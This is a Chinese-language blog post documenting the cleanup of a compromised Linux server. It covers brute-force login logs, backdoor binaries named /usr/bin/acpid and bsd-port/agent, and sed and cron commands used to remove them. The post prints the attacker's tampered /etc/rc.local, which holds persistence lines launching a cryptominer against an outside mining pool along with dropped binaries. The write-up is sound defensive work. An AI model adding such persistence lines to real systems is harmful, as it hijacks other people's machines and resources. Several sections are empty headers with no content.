攻击类型:
主要是后门和肉鸡行为
先解决后门的问题:
步骤
(1)搞清楚后门文件的来历(是如何产生的)
(2)删除后门文件
具体做法:
使用定时器 定期删除后门文件
待删除的文件列表:
(a)/usr/bin/acpid
(b)/usr/bin/bsd-port/agent
定时器要执行的脚本:
定时器:
如何解决肉鸡行为呢?
查看/var/log/secure ,看到确实被多次尝试登陆
[root@iz25tti3rxdz log]# cat secure| grep 'failed password' | cut -d " " -f 9,10,11 | sort | uniq
apache from 121.42.0.30
ftp from 121.42.0.30
invalid user admin
invalid user test
invalid user user
mail from 121.42.0.30
root from 121.42.0.30
发现可疑进程:
如何提高安全性?
我觉得应该有一个机制:
当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信
查看root的home目录下的.bash_history
终于发现了猫腻:
同时还修改我系统核心文件/etc/rc.local
于是查看/etc/rc.local 的修改记录:
[root@iz25tti3rxdz ~]# stat /etc/rc.local
file: `/etc/rc.local'
size: 390 blocks: 8 io block: 4096 regular file
device: ca01h/51713dinode: 787612 links: 1
access: (0755/-rwxr-xr-x) uid: ( 0/ root) gid: ( 0/ root)
access: 2016-01-10 16:34:59.807094407 +0800
modify: 2015-12-07 11:23:07.160211728 +0800
change: 2015-12-07 11:23:07.160211728 +0800
说明在2015-12-07 11:23:07被人恶意修改过
再看看修改成啥样了:
#!/bin/sh
#
# this script will be executed *after* all the other init scripts.
# you can put your own initialization stuff in here if you don't
# want to do the full sys v style init stuff.
touch /var/lock/subsys/local
/tmp/minerd -a scrypt -o 220.135.22.146:9327 -u lnzyzebafzdgwb3cca13qjbckj2jfqttkk
/mnt/linsx
/tmp/linex
/tmp/2897
~
正常的:
解决方法:
sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local
异常进程:
[root@iz25tti3rxdz ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep
root 16790 1 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16804 16790 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16805 16804 0 16:48 ? 00:00:00 /usr/bin/acpid
如何杀*死异常进程:
ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -f" " {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -f" " {'print $2'}|xargs -i kill -9 {}
上述代码是在定时器中执行的,每10分钟执行一次